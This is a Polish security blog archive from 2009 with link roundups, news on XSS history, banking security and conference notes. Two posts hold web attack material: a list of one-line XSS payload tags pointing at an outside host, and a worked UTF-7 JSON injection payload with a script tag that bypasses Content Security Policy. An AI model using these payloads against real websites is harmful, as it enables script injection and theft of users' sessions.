19 gru 2009

Stalowa chrona kart zbliżeniowych

Posiadając, ostatnio często reklamowane przez różne bank, kartę zbliżeniową, jesteśmy narażeni na możliwość zczytania z niej danych.

W jaki sposób możemy się zabezpieczyć przed złodziejami? Z pomocą przychodzi portfel 'utkany ze stali'.



Według opisu producenta, posiadając taki portfel, możemy się odprężyć i być spokojni, że nasze dane pozostaną przy nas.

Portfel utkany jest z ponad 20.000 super cienkich nici wykonanych z nierdzewnej stali. Gęstość konstrukcji tworzy pancerz naokoło naszych kart. Dzięki niej, nasze karty, są bezpieczniejsze niż do tej pory.

Metodologia szycia przypomina nam model klatki Faradaya - pomieszczenia mającego na celu zablokowanie zewnętrznych pól elektrycznych. Analogicznie wykonany portfel, zapewnia zabezpieczenie jego zawartości.

Oprócz utrudnienia zczytywania danych dla 'nowoczesnych' kieszonkowców, stalowy portfel zabezpiecza karty również przed kradzieżą metodę brute-force ;) (metal zamiast materiału).

Portfel jest w stanie pomieścić sześć kart, posiada dwa sloty wewnętrzne i 'spinkę' na banknoty.

W tej chwili dostępne są dwa modele - "Smooth" oraz "Engine Turned" - w cenie $79.95(£49 /€ 55) ~ ok. 232 PLN

Więcej o portfelu: http://www.herringtoncatalog.com/es675.html

16 gru 2009

#10 'te #urodziny #xss ! sto lat sto lat :)

16-ego stycznia, 2000, dla małej grupki inżynierów w Microsoft, zostaly zasugerowane nastepujace nazwy:

Unauthorized Site Scripting
Unofficial Site Scripting
URL Parameter Script Insertion
Cross Site Scripting
Synthesized Scripting
Fraudulent Scripting

Następnego dnia uzgodniono nazwę - Cross Site Scripting.

Na początku lutego, wypuszczono dokument (CERT):

http://www.cert.org/advisories/CA-2000-02.html

Według niektórych źródeł, za datę narodzin #XSS uznaje się środek grudnia 1999 (czyli 10 lat temu). Jednak zgodzę się tutaj z radekk, i też uznałbym raczej datę 'advisory release'.


Co się zmieniło przez ten czas? Bardzo wiele :).

Kiedyś #XSS uznawane były za nic nie znaczące, denerwujące błędy umożliwiające wyświetlenie okienka z napisem CZESC.

Wraz z pojawieniem sie 'web 2.0' sytuacja ta zmieniła się. Powstały potężne społeczności internetowe, zawierające setki tysięcy danych użytkowników. Idealne miejsce do zbierania informacji typu: login, hasło, mail, odrazu stało się głównym celem hackerów, phisherów (chyba wszyscy pamiętamy popularnego Samy (JS.Spacehero). Błędy typu SQL Injection nie były już problemem 'numer jeden' (chociaż nadal są równie niebezpieczne), bo po co dostawać się do wnętrza systemu, skoro można wykorzystać błąd po stronie zalogowanego użytkownika, pobierając jego dane identyfikacyjne (np. dane zawarte w cookie).

XSS rozwijało się w zastraszającym tempie, od prostych skryptów typu alert(document.cookie), aż po wyrafinowane skrypty które można łączyć z innego rodzaju błędami. Jako ciekawostki można polecić:

Cross Domain Search Timing

Sprawdz czy jestes zalogowany/a na google

Łącząc różne techniki ataków (CSRF, XCSS...), można stworzyć naprawdę niebezpieczne skrypty/ robaki, infekujące zarówno web serwisy, jak i komputery użytkowników.

Jak widać, nigdy nie należy nie doceniać nawet najprostszego rodzaju błędów.

3RTHF3QVVPJ2

9 gru 2009

(update) do (in)security tygodnia

Nie wiem czemu ale zapodzialo mi się to gdzieś, więc wstawiam teraz:


http://www.heise-online.pl/security/news/item/Nowy-sposob-lamania-szyfru-AES-878754.html Nowy sposób na #łamanie #AES #security #crypto

All in one exploit...s !

Witam. Dzisiaj w moje raczki wpadla super paczka mini tyci exploitow ;)

Otoz pan sirdarckcat przed chwilą opublikował niezły zestaw exploitów all in one.

Oto one:

http://0x.lv/xss.xml XBL+XHTML

http://0x.lv/xss.css (binding/expression/jsuri)

http://0x.lv/xss.swf (getURL)

<script src=//0x.lv> LUB <link rel=stylesheet href=//0x.lv> LUB <img src=//0x.lv> LUB <iframe src=//0x.lv> także: XHR/RFI/etc


Testujcie testujcie :)

http://0x.lv/ all in one BMP+JS+CSS+HTML+HTTP+XHR XSS exploit ;)

8 gru 2009

(in)security tygodnia

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:

http://www.net-security.org/secworld.php?id=8594
#Fake #fingerprint fools #biometric #devices #security


http://www.heise-online.pl/security/news/item/Ostatnia-deska-ratunku-UFO-hakera-877758.html
Ostatnia deska ratunku "#UFO-#haker a"#Gary ’ego #McKinnon a


http://www.networkworld.com/news/2009/120709-facebook-users-fall-for-rubber.html

#Facebook users fall for #rubber #duck 's #friend request #security


http://packetstormsecurity.org/filedesc/xampp172-password.txt.html
The page used to change the #administrative #password in #XAMPP version #1.7.2 has no access #restrictions in place. #security

http://www.security.nl/artikel/31717/1/NASA_websites_via_SQL-injectie_gehackt.html
#NASA #website s via #SQL -#injection #security

http://flaker.pl/f/3213052
#HTML5 new #XSS #vectors

http://bothunters.pl/2009/12/02/wykryto-rozproszony-system-odgadywania-hasel-do-uslugi-yahoo-mail/
Wykryto rozproszony system odgadywania #haseł do usługi #Yahoo #mail #security



http://pentestit.com/2009/12/08/waca-web-application-configuration-analyzer
#WACA: The #Web #Application #Configuration #Analyzer ! #security


http://www.securiteam.com/unixfocus/6S0012AQAQ.html
#FreeBSD #SSL and #TLS #Session #Renegotiation #vulnerability #security



http://www.securityfocus.com/bid/37212
#Microsoft #Internet #Explorer #CSS #Race #Condition #Remote #Code #Execution #Vulnerability

2 gru 2009

OWASP TOP10 2010 RC1 PL

W związku z niedawno opulbikowanym #OWASP TOP10 RC1 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project postanowiłem przetłumaczyć dokument, wzbogacając go o parę własnych zdań. Dokument pobieramy tutaj: http://www.slideshare.net/thinksecure/owasp-top10-2010-rc1-pl


Aktualizacja:

Zapraszam rowniez na: http://pentester.jogger.pl/2009/12/02/owasp-top-10/


1 gru 2009

(in)security tygodnia


Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:



http://www.thespanner.co.uk/2009/11/23/ping-pong-obfuscation/ #Obfuskacja w obfuskacji obfuskacji... #xss #security #garethheyes #obfuscation

http://seclists.org/fulldisclosure/2009/Nov/349 bledy #XSS na stronach #404 w #Apache #Tomcat

http://www.theregister.co.uk/2009/11/30/wordpress_password_cracking/ #Web service #automates #WordPress #password #cracking #security

http://www.net-security.org/secworld.php?id=8550 #Nessus 4.2 #released #security

http://feedproxy.google.com/~r/wampir-mroczna-zaloga-org/~3/1_kokNJtzNc/772-o-unikaniu-waf.html Shocking #News in #PHP #Exploitation (autor: #Stefan #Esser) #security

http://pentestit.com/2009/11/28/pixy-tool-finding-xss-sqli-vulnerabilities/ #Pixy – Tool for finding #XSS and #SQLI #vulnerabilities #security

http://gynvael.coldwind.pl/?id=256 #security #CONFidence #2.0, #materiały, #SilkProxy 0.0.1





23 lis 2009

CSP na kolana

Gareth Heyes opublikował właśnie na swoim blogu, informację dotyczącą sposobu ominięcia zabezpieczeń w #CSP http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/


Na czym polega błąd?

Każda strona z feedem JSON'a nad którym może mieć kontrolę atakujący, może zostać zarażona własnym ciągiem JSON'a, dzięki czemu można kontrolować pozostałe elementy feed'a.
Wyjaśnijmy to na przykładzie. W UTF-7 ABC pojawia się jako:


+ACcAQQBCAEMAJw-

jeżeli przykładowa odpowiedź w JSON wygląda tak:

[{'friend':'something',email:'something'} ]

mając kontrolę nad wartością: something, możemy umieścić własny kod:


+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-

(w UTF-8: '}];alert('May the force be with you');[{'job':'done )

Umieszczając w/w kod, powstaje nam:

[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw
BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw
BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb
wBiACcAOgAnAGQAbwBuAGU-'}]

czyli:


[{'friend':'luke','email':''}];alert(’May the force be with you’);[{'job':'done'}]

Wstrzykując takie dane, poprzez odwołanie się do skryptu (ustawiając kodowanie na UTF-7):

"><script src="http://some.website/test.json" charset="utf-7"></script>

uruchamiamy kod pod CSP, omijając zabezpieczenia.


Przykładowe działające demo: http://www.businessinfo.co.uk/labs/cspluke/test.html

Więcej informacji na temat CSP: http://blog.mozilla.com/security/2009/09/30/a-glimpse-into-the-future-of-browser-security/
Testy CSP: http://people.mozilla.org/~bsterne/content-security-policy/demo.cgi

Zapraszam do testów :)

18 lis 2009

Każdy lubi puknąć

Przeglądając lifehack'i, trafiłem na dosyć ciekawe zastosowanie pukania jako klucza do drzwi.



Muszę przyznać, że pomysł jest naprawdę oryginalny, ale ma wiele wad i raczej nie znajdzie zastosowania jako zabezpieczenie drzwi wejsciowych od domu.

http://www.engadget.com/2009/11/04/secret-knock-door-lock-defends-home-from-rhythmically-impaired/

Infiltracja w Polsce

No proszę, myślałem że już nic mnie w tym kraju nie zaskoczy, a tu takie numery...


http://osnews.pl/rzad-ujawnil-projekt-filtrowania-internetu-w-polsce/

CONFidence 2.0

To już jutro,

Agenda: http://200902.confidence.org.pl/agenda/

Zapowiada się naprawdę ciekawie :)

Jednak widzę, że ponownie będzie problem z wyborem niektórych wykładów, np:

Gareth Heyes XSS Lightsabre techniques using Hackvertor
oraz w tym samym czasie:
Frank Breedijk AutoNessus: analyzing vulnerability assessment data the easy way…

tak samo: Gynvael Coldwind Practical security in computer games
oraz:
Claudio Criscione The glass cage. Virtualization security

Zobaczymy jak to będzie...

17 lis 2009

(in)security tygodnia

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:



http://www.examiner.com/x-14651-Minneapolis-Information-Technology-Examiner~y2009m11d11-Cenzic-wants-to-make-sure-your-Web-site-is-healthy?cid=email-this-article
#Cenzic wants to make sure your #Web site is #healthy

http://www.darknet.org.uk/2009/11/ssl-renegotiation-bug-succesfully-used-to-attack-twitter/
#SSL #Renegotiation #Bug Succesfully Used To #Attack #Twitter

http://www.heise-online.pl/security/news/item/Krytyka-raportu-o-lukach-859104.html
#Krytyka #raportu o lukach

http://pentestit.com/2009/11/13/simple-small-114-tools-perl-penetration-testing
#Simple small 114 #tools in perl for #enumeration and #penetration #testing

http://chuvakin.blogspot.com/2009/11/more-pci-devil-defense.html
More #PCI #Devil #Defense

http://www.net-security.org/secworld.php?id=8490
#Facebook groups #hacked through design #flaw

http://www.foregroundsecurity.com/MyBlog/flash-origin-policy-issues.html
#Flash #Origin #Policy #Issues

http://www.foreignaffairs.com/articles/65499/wesley-k-clark-and-peter-l-levin/securing-the-information-highway
#Securing the #Information Highway

http://ha.ckers.org/blog/20091116/session-fixation-via-dns-rebinding/
#Session #Fixation Via #DNS #Rebinding

http://niebezpiecznik.pl/post/nowe-archiwum-exploitow-kontynuacja-milw0rma/
Nowe Archiwum #Exploitów — kontynuacja milw0rma?

10 lis 2009

(in)security tygodnia


Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek:


http://blog.securitystandard.pl/news/352111.html - Łamanie haseł w chmurze #pgp #lamanie #security #cloud

http://blogs.zdnet.com/security/?p=4805 - iHack wirus na iPhone #iphone #wirus #security #jail

http://livelabs.com/web-sandbox/ - Web sandbox od microsoft #microsoft #web #security #sandbox

http://chuvakin.blogspot.com/2009/11/releasing-many-of-my-security-papers.html - Mega zbiór ciekawych dokumentów #ebook #security #thinksecure

http://blog.ivanristic.com/2009/11/ssl-and-tls-authentication-gap-vulnerability-discovered.html - SSL and TLS Authentication Gap vulnerability #ssl #vulnerability #tls #security

http://news.cnet.com/8301-1009_3-10390118-83.html - Corporate bank accounts targeted in online fraud #bank #fraud #security

http://devcentral.f5.com/weblogs/macvittie/archive/2009/11/06/when-is-more-important-than-where-in-web-application-security.aspx - VICTIMS DON’T CARE ABOUT WHERE, THEY CARE ABOUT BEING PROTECTED #security #web #websecurity

http://www.heise-online.pl/security/news/item/Facebook-i-MySpace-naprawiaja-flashowe-backdoory-852288.html - Dziury w facebook i MySpace #facebook #myspace #flash #security #crossdomain

http://blog.codeninja.pl/2009/11/threat-modeling-in-end.html - Threat Modeling in The End #threatmodeling #rezos #security




4 lis 2009

str0ke nie żyje, milw0rm

bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html

Many of us have wondered where str0ke has been and why #milw0rm has not been updated in a good while. I recently was informed that #str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.
Sadly....
I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at #9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.
We wish nothing but blessing to his wife and 4 children.
#RIP str0ke 1974-04-29 - 2009-11-03 09:23 
:o(

2 lis 2009

(in)security tygodnia

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek:



http://blog.itsecurityexpert.co.uk/2009/11/how-secure-is-your-uk-online-banking.html - odnośnie ostatniego wpisu


http://www.heise-online.pl/security/news/item/Hasla-wielowyrazowe-w-systemie-platnosci-Amazona-846478.html


http://www.securitum.pl/baza-wiedzy/publikacje/zdalny-root-na-routerze-soho


http://www.securitytube.net/Evolution-of-Security-(Fsecure)-video.aspx


http://www.theregister.co.uk/2009/10/27/mass_website_compromises_spike/


http://www.itproportal.com/www/news/article/2009/10/28/how-will-windows-7-affect-risk-management-business/


http://www.abw.gov.pl/portal/pl/8/381/Warszawa_28102009_r.html


http://bothunters.pl/2009/11/02/byl-facebook-jest-myspace-czekamy-na-hasla-na-naszej-klasie/?owa_from=feed&owa_sid=


http://www.microsoft.com/downloads/details.aspx?FamilyID=037f3771-330e-4457-a52c-5b085dc0a4cd&displaylang=en


http://prawo.vagla.pl/node/8722

27 paź 2009

nie-Bezpieczenstwo w bankowości internetowej.

Przymierzałem się do napisania notki odnośnie w/w tematu, ale Przemysław Skowron zrobił to wcześniej na swoim blogu :)

Nie zamierzam rezygnować z wpisu, więc...

Raport czytało się przyjemnie, ale tak jak wspomniał kolega P. Skowron, również podszedłbym do sprawy bezpieczeństwa w bankowości internetowej trochę z innej strony.

Załóżmy, że klient posiadający działalność gospodarczą posiada konto firmowe w znanym banku (z dostępem przez internet). Jak wiadomo, w dzisiejszych czasach najcenniejszą rzeczą jest informacja.
Informacja która dotyczy działania firmy, kontaktów handlowych oraz strategicznych aspektów stanowi podstawę działalności na rynku danego przedsiębiorstwa. Dla klienta z kontem firmowym strata 5, czy 50 pln podczas transakcji internetowej raczej nie będzie miała większego wpływu na dalsze losy firmy. O wiele większe straty mogą powstać w chwili ujawnienia danych typu: ile pln, dla jakiego odbiorcy, z jaką datą będzie wykonywany przelew (albo historia przelewów).

Trochę inaczej wygląda sprawa w przypadku klienta indywidualnego. W tym przypadku osoba atakująca skupia się nie tylko na dostępie do konkretnej kwoty przelewu,  ale również na zebraniu jak największej ilości danych odnośnie danego klienta. Tego typu dane mogą posłużyć do innego rodzaju ataków (np. phishing). Posiadając informacje odnośnie adresu, imion oraz nazwiska klienta, stanu konta jesteśmy w stanie stworzyć prawie idealnie wiarygodny e-mail od banku, nakłaniający np. do zmiany hasła, lub ponownego przelania danej kwoty ale na inny numer konta.

Czyli stosowanie tokenów potwierdzających transakcje jest złe? NIE! Absolutnie!
Warto pamiętać, że zatrzymując się na wprowadzeniu samych tokenów to tak samo jak zatrzymać się na bezpieczeństwie poprzez wprowadzenie wirtualnej klawiatury.


Cytując wpis z w/w blogu:

"Wielokrotnie powtarzałem, że bezpieczeństwo systemu bankowości elektronicznej składa się z trzech dużych obszarów:

bezpieczeństwa samego systemu po stronie banku,
bezpieczeństwa komunikacji,
bezpieczeństwa klienta (komputera klienta),"

Podsumowując, możemy:


  • sprawdzić czy strona logowania/ transakcji nie posiada żadnych błędów typu: XSS, SQL Inj., Information disc., Clickjack, CSRF...
<+Dr_Link> SSL certificate: $30.
<+CoJaBo-Aztec> Dell mainframe server: $1.
<+CoJaBo-Aztec> Discount cupon: -$80,000.
<+Dr_Link> Getting hacked by a POST injection: Priceless.
  • stosować 'bezpieczne' połączenia SSL, które niewiele dadzą jeżeli pojawi się błąd z poprzedniego punktu + nie będziemy mieli ustawionej flagi Secure dla cookies.
  • stosować pytanie o dane na 'wyrywki' (PESEL, hasło potwierdzające),
  • wprowadzić wirtualną klawiaturę; nie aż tak dobre rozwiązanie, biorąc pod uwagę przykładowe pomysły na ominięcie tego 'zabezpieczenia',
  • oraz wiele innych...


Kiedy już posiadamy super twierdzę, zabezpieczoną z trzech stron, nadal pozostaje nam najsłabsze ogniwo: Klient... 

- Halo ?
- Witam, tu bank...

(in)security tygodnia

Postanowiłem, co tydzień we wtorek, dzielić się z wami ciekawostkami z świata (in)security. Spośród setek informacji z różnych portafi wybrałem, moim zdaniem, te najciekawsze. Miłej lektury ;)

9 paź 2009

ryzyko podatność skutek zagrożenie błąd...

Podczas ostatniej konferencji (GigaCon BIN- Bezpieczenstwo i niezawodnosc) miałem możliwość wziąć udział w bardzo ciekawym wykładzie. Pani X (niestety nie pamiętam nazwiska, jeżeli ktoś był i zanotował to proszę o kontakt) rozpoczęła wykład od wytłumaczenia różnicy między zagrożeniem, ryzykiem, podatnością a skutkiem. Okazuje się, że wiele osób  myli w/ w pojęcia. Wyjaśniono, że:


- podatność to zestaw ryzyk
- jedna podatność może mieć wpływ na 100 zagrożeń


Na przykładzie:


Zagrożenie: zwisające sople
Ryzyko: przechodzenie obok sopli, przechodzenie pod soplami, stanie bezpośrednio pod soplami


Chciałbym żeby ktoś spróbował sklasyfikować (warto przeczytać) w podobny sposób (zagrożenie, ryzyko, podatność, skutek) dowolny błąd związany z bezpieczeństwem serwisu internetowego. Np.: XSS

8 paź 2009

A jednak

Witam wszystkich. Zlamalem sie, zalozylem bloga :) Znajdziecie tu:
...czas pokaze